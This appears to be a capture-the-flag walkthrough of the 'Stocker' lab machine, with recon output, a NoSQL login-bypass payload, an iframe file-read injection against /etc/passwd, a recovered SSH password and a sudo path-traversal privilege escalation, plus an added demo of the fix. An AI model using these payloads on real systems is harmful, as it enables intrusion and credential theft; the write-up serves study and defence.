10.10.11.196
Information gathering

start infoscan
(icmp) Target 10.10.11.196 is alive
[*] Icmp alive hosts len is: 1
10.10.11.196:80 open
10.10.11.196:22 open
[*] alive ports len is: 2
start vulscan
echo "10.10.11.196 stocker.htb" >> /etc/hosts
wpscan --url http://stocker.htb/
Scan Aborted: The remote website is up, but does not seem to be running WordPress.
./gobuster.sh
http://stocker.htb/img   (Status: 301) [Size: 178] [--> http://stocker.htb/img/]
http://stocker.htb/css   (Status: 301) [Size: 178] [--> http://stocker.htb/css/]
http://stocker.htb/js    (Status: 301) [Size: 178] [--> http://stocker.htb/js/]
http://stocker.htb/fonts (Status: 301) [Size: 178] [--> http://stocker.htb/fonts/]
gobuster vhost --url http://stocker.htb/ --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain -t 100
Found: dev.stocker.htb Status: 302 [Size: 28] [--> /login]
echo "10.10.11.196 dev.stocker.htb" >> /etc/hosts
Server info: nginx/1.18.0 (Ubuntu)
http://dev.stocker.htb
Getting a shell: NoSQL injection
Burp Repeater
GET /login HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: connect.sid=s%3Apzr1nuOtmsUnoBSx0A0Zi6o9jWDTjgfx.I0oLW4eEyOjzaawO4y68Gxv%2FkmkeID5DmkqCwGJkiWk
Upgrade-Insecure-Requests: 1
Referer: http://dev.stocker.htb/stock
Content-Length: 57

{"username": {"$ne": null}, "password": {"$ne": null}}
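As an added example (not the Stocker application's own code), this shows why the login body above gets past the check and what input validation stops it. The user record and the small filter matcher are constructed stand-ins for the Mongo collection and driver.

```javascript
// Constructed stand-in for the users collection (not real credentials).
const USERS = [{ username: 'angoose', password: 'example-secret' }];

// Minimal model of the MongoDB filter semantics the bug depends on:
// a plain value means equality, {$ne: v} means "not equal to v".
function fieldMatches(stored, criterion) {
  if (criterion !== null && typeof criterion === 'object') {
    if ('$ne' in criterion) return stored !== criterion.$ne;
    return false; // other operators are not modelled here
  }
  return stored === criterion;
}

function findOne(filter) {
  const hit = USERS.find(u =>
    Object.keys(filter).every(k => fieldMatches(u[k], filter[k])));
  return hit || null;
}

// Vulnerable pattern: the parsed JSON body goes straight into the query,
// so an attacker-supplied object is interpreted as a query operator.
function loginVulnerable(body) {
  return findOne({ username: body.username, password: body.password }) !== null;
}

// Hardened pattern: only primitive strings reach the query, so an object
// such as {"$ne": null} is rejected before the driver ever sees it.
function loginHardened(body) {
  if (typeof body.username !== 'string' || typeof body.password !== 'string') {
    return false;
  }
  return findOne({ username: body.username, password: body.password }) !== null;
}

// The body from the Burp request above, plus a valid and an invalid login.
const INJECTION = { username: { $ne: null }, password: { $ne: null } };
const GOOD = { username: 'angoose', password: 'example-secret' };
const BAD = { username: 'angoose', password: 'wrong' };

console.log('vulnerable accepts injection:', loginVulnerable(INJECTION)); // true
console.log('hardened accepts injection:', loginHardened(INJECTION));     // false
```

The same type check belongs on every field that is copied from a request body into a query; a schema validator on the route gives the same protection for the whole object.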
Burp Repeater 2
POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: connect.sid=s%3Apzr1nuOtmsUnoBSx0A0Zi6o9jWDTjgfx.I0oLW4eEyOjzaawO4y68Gxv%2FkmkeID5DmkqCwGJkiWk
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 370

{"basket": [{"_id": "638f116eeb060210cbd83a8f", "title": "<iframe src=file:///etc/passwd height=750px width=750px</iframe>", "description": "It's a rubbish bin.", "image": "bin.jpg", "price": 76, "currentStock": 15, "__v": 0, "amount": 1}]}

Response:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 16 Jun 2023 14:12:45 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 53
Connection: close
X-Powered-By: Express
ETag: W/"35-wdJz8BSxG+QfgESwzE+FGjqXwXk"

{"success":true,"orderId":"648c6dddb1b0836ceb84025a"}

Opening http://dev.stocker.htb/api/po/648c6dddb1b0836ceb84025a should show the items you bought, but instead it shows the content of /etc/passwd. In the same way we can also read the content of /var/www/dev/index.js.
Once we have index.js, we find a password in it and use it to connect over SSH.
ssh angoose@10.10.11.196
password: IHeardPassphrasesArePrettySecure
Privilege escalation via sudo

sudo -l
[sudo] password for angoose:
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js
cp root-flag.js /usr/local/scripts/
cp: cannot create regular file '/usr/local/scripts/root-flag.js': Permission denied
/usr/local/scripts is neither readable nor writable. The sudo rule, however, only matches the argument as a glob pattern, so a path that starts with /usr/local/scripts/ and then traverses back out with ../ still satisfies it.
sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/root-flag.js
root-flag.js
// root-flag.js: executed as root through the sudo rule above, so it can read /root/root.txt
const fs = require('fs');
fs.readFile('/root/root.txt', 'utf8', (err, data) => {
  if (err) throw err;
  console.log(data);
});
Conclusion

1. What is VHOST enumeration mode? How does it work, and why can it enumerate subdomains?
2. https://github.com/EdgeSecurityTeam/EHole/releases/download/v3.1/EHole_linux_amd64.zip
   cd /pentest/scan; ./EHole_linux_amd64 finger -u http://dev.stocker.htb/login -l finger.json
3. Installed FileZilla for faster file transfer.
4. sudo -l